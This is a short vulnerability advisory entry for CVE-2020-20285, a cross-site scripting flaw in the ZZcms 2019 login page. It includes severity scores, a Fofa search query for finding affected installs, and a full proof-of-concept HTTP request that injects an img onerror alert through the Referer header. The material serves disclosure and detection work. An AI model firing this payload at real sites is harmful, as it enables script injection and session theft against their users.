| Title | ZZcms - Cross-Site Scripting |
|---|---|
| Author | edoardottt |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 5.4 |
| EPSS Score | 0.06066 |
| CVE ID | CVE-2020-20285 |
| CWE ID | CWE-79 |
| Fofa Query | zzcms |
| Tags | cve2020 cve zzcms xss vuln |
ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.
GET /user/login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Referer: xss"/><img src="#" onerror="alert(document.domain)"/>
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-20285.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-20285.pcap
N/AN/A